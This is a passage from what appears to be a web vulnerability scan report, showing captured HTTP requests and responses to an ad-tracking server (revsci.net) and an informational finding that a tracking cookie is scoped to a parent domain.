udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_TtGD="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhphpDfnVA0m2LzBczWmMLdaJpq0puyTTKIVVeI8wvPXGb0kaNJ+PBq0PJ6Z5EGuWUSi7qxn0z+u24oT+sQhXqf/LqomtRQQp2k/0kgJOMwE0rgberAxHDkvIZ79o1w4Z3xe53oClrmlyq5dT1Wo0EtdS4e6Pa33pXm3VTCbXlcX+6yNa0fxojgEWiCVQEpMgRq8WZJafZk5wwYqgMMnJSyRQs9x7wojbgVW3mFG9FBfCJK4psFLR3EKLioGXwVv9IFbbOw4httLbRIjpJFWAdfjC20tw6jz2f5PcCatSGMbnF9jdSOabfkWXvNxcIfRWGrCsmm9PE/2EUyQ3uD91+X4/AAe1h3hf7WtwBwa+A1xfmNUqMEmVJ361VchWpIGU1mAY51h4fsDOib+MzqTa2I47zJ2oAzQ11FFtSsYCzaLnGUrHubVQ6PuvH5oREoy9Vim2KKjt2EN6NQm+juzJAovId4TWM1TLGnU6NArmoNq7ZRkQH8KbB4/BOKwQctePWAlxVGDyT14uZ7Xcahu3VyTm9qOpIK+Hi/FKMYZ96e9iAFmOHJDSEjY/PrG6FM4idnWcb0RMdhwetWriJB4IvHvRoTkaAvVjwnRPLJ7QbZy8RvCZLSI+Mb30f+zocCdayU33zC3kB8OKwoG/sPOZp6D47HdxeMIGAn6A4EqOOypzL9IaWyMiABFAJkpO/J53o+VhIwjaX2Zx9HxyblPPlcYcXDoVz8oxHe1TVv4ZhojzCNc9rDJ2AAkxWHsvYHKgV8uNKlhcbT5XGELzGfp/u2mJNsj3BZcXBYi0O0qPDI0HmNf2EYnH81ruOA5CGvX6mH7vCFoYKZS/9p7R3pffzbrXjQPcgR6HsN2oikpauB4oAXdbHQZJBqNm1VZlUxriq4jAIFtnyvSVeNwt7i4akKnDujJYU9ZkI12qoTqF67Xk1usO2dtWltsQIwovXGM/7npnaN4iUOXZTHAuoI9I5+XEK/Spf3sZoJyCFFfawdJk3OcbrJy38Vl2kK3T9RnQAOPHtujBtZlECpIwPkKnWbH21vjF924KpxmiajYBXbun0dzjwI+dPIaE12xV2JwN0VjfL5f3/yuosBB3QMuZRKHCWcFuMIMmmVE/iudLUTgaIGEimupLhKwJEGT+uDq/WPU3dy7QCr/MmedbUut4vRz4jRQx/oRKsNgzBeVM0lF7vZcCsSFWp+5IWW8nYn5MQ+3PCfNCw/QdE9/i9rW51wGEJyA7EHMC20nBW2EuLmF/2MO0/Qb37AgH5OzNFx/EOCweAh9VF2E5TiaLr3qdPMoPf0g=="; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIduu0zKlUsklbhZdu0eMonYIJbEzjiiDuJ/zTlJnHw6NLLrH6DRvNQYun6OEnNMId6BuhbhqVCW6mK5/OpNaC0t8igLY/4tLWs98nccpf3RMNYxqd3CDa2hZUhOvr3RbS4WmY/JpoypuPt62XFqVu26y21cp846w4B1oNfsfa3gdsvv5TQr9010uW8V68kcSgyHdFs6zkIFFdxHhKRqPH22OKsM01SHNH5CgYE8TKpBKRi/r8TM+T2VopZEhjil/s/ryZgVOYDLCiMbU2wc49Yq4v9jgod/LMb0C1RPESb+VlyFPFa+hUw91Emca0CYwjJu8GuWaxlVlmDd+4yyQur3+98EdufmYGEVcWdxvJEdEEqM/+P73dWRG+cG2Zg4PMzibEWH+uX+PKSIPwUXcdq4d7o22XeQxkVHmdYIT3tH292wXrqVICF6LzxpwGsmT/WvH/a3vASqFEOUT52i2tfn6fncA3Lnf3DDNMmYX+MeEf0Og5DcItZXD61CdeBCI2cjGBrJTBJyT3nreFca+VR5Z3HjjKhWFLqVYSbsn0ZYVB7LNEmgyiPfhzdRR6bWkjNJwozmOc3fvrkNw9CNiVcGJUkQlFc1WvKXDXnga6xk9e0i4q8tMzUn4T+rbQ83v/SYy/xbh8sP0ximayS9XZWO5+CluJkUk85bZMbCuB+Ik/KZAF4aqZQ4ZvHoJq4zTxglm2ewijhKHhzErTPi0iMmBv4Ht8FJhCENtmChEiqxhdiDDP1SeW8h3eEPIBXDCs/wHf/xSMiEJwAP2Y98pc6jHRotuzCREAzM3TYioHSfNZFpQLwpvqLLAHKFDUakZ3P93Zp7WEmE9V6tD6Pup8UJryE1CORWQiB9Rut+P4Ve8ib/zR3GE7riSAwx/nmNBX+TympwelaDVPoCe5vP/0UpciqM2r2WdO0yZt9U7mCaVOj9vjofyg7KjB3JJ3a7QQ2+ItWxXxOvADytVwDRCaETLlfSXZRF8MTvb5toU0JrcfZK1avEeIy22iiKkgzYJ83IX1u99j0PmDe5IcWhX/WJm+tmxN/jF1vtCGUkz7Ai8vI2sb0VUSmLZJP79tRKj7KRS7Ht5bmt3pD9paJ/NU9ddGdrTUYriAAtTFQQ3b/DTPwspPo31rbwg7NQiCwPwoBCeKS7qmqpFa41E2D7AY3vCymi5rHBznlwcs9Uap3I8MoBSjJNbUm5qiD7qjGXiA9asG7cTMyPVds8k279gMCJK8Ot2OeGW2+Lg8ipfQyWcYqccIJ9DHGivCVISnoP7PwF9zsuxVm7QhdhkUrjqX3nKY/sh5XSYullw5DCNgmvw6i1jpFs2D5lRxYfgVNHrc98/4txoF1JRAbTKCkgsiz/hPkn2Tua6EJsMEbCo01RjWNaFUCiVIvbFUvZn+t7y3VCPlzeQjF4Gg7rVqNbo5hNH01RdxeyHXnnjJRMHZtUilaps7Lfez4NizQRUzJyASf9Ra4CFDTBdqxuOSCVllk7hNyoMQt+IhNKFO/JYKbH8+iXdxCTUAiIGJNa6V0St0H3ccCDTHfCT0+uziiUlQ6ErjTE7yhdRdkHO4B2eOLhZOlKMF5eVUYV32R4xsMhnXQsL6A3LS9EG9mD4pA6lSdme9thAelEZVjJjcGiy4Aq7sAfYP90TyQL5f3JeWl0UfCi9IO3ouNkdj75IzFqyumryw4Tlw+Y2FWyOVfSfodfY0VoRCVZ8VQhNZ1X0vsQOA=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDw+Y00aHQ2YhnXE9qdN9E/C1TQIk5T/IxSnoCu7tbH3064WZv3POyggS9oGg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D0WTbuOuqwzrTh6D07lJMXkAZBhiSC8XdnKccC9ridpZlYwlDrMd+Xsw4jfPzK/1xf0zWwMrA/z4+adSy8AQ+/bPvWVHlEOkSUWbhx4koFoXhdxjg793faLYGuBz9dgMCEDIzrrOaF+82xyu13GX8yqklpeilr7fO5GXUyZ9/JI9p102eUI7O1KiczNpQSIk0ZtC1Vx48kZ0cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+TonH9N3g785XpchwMSTNEkg72LuQq7hJcS8A8P0y; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:16:02 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:16:02 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.138. http://pix04.revsci.net/I10985/b3/0/3/1008211/266352153.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/266352153.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54fwOVkMaFAobUG24cBItVdGihd0sK3hMs6HbnIYcP2I3tgk7tyNj/CzYfV5FqstcqOop1zqPFXKfIvvmEo0ON7M6w6+YxBJfrsIqbws/ZDBnp4g3ZVklyBZNtps8MXjN8V1WG8p/Ol7HkTm5q7eShAm36bmKM7dx1A/Vxwef83PAeTH8qIcBf02eAyO1/7xFtrS0DhXUOdRHhAzlA0KYq2ET5UVu59BjzK6KOWnK/nEb/SXdvcpSNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:15:44 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/266352153.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbNejrhdMiSolHtUkaU9woFboI0gpEvgcSpvC6rRKSKvIVBxkKu6aTDQ3qvM9EyE1U4Up1zpIGHMftOgG74XPCd95sScSFvuK8duCYKnT000jVh9ooojowJpFoXZoqWOaZCpp1PBATAS6s59h1xaqvlGGaQufIEiW55ytgO/T1incBQ3ecpBIxMZdi0cAKzBDgKCyPxknZaaBnqoVHxjdk4GEQ9+dSjiFw4sFvkyrdgfzJyg5Cne6b7E6K9jbR2ShKCSz/z1iYgGkSf1mqGP2lYOknp9o3/ZIQ1pdcs+HKCapC8qO3tZVW2M7OBb0u1PAHPEGf+yyxkPuyrQgQ34G1Ue4G5uEAkslyh+qdighV5QpToqFJyc/3AdN6hvwFM3sM9S8kIH14MKuy0glR3WC7HNe92EpXQjDe7iS8W9AFNGwY+Su4SnW2JHCOjVeCwbXxPvMuVavDBAmKJh0f+sZvdXpMiD5ZTkGXqT1UPrX6yL4OXgJpnTkKwTxrcZqvSsarY5cDpvmaV+6Zj8OlMHCWJkhGpz/2aUDAqL7k/WFuOQq8UB70meEsDHwNFkXClqdFB2QjBC6zhg+Xfnw1RB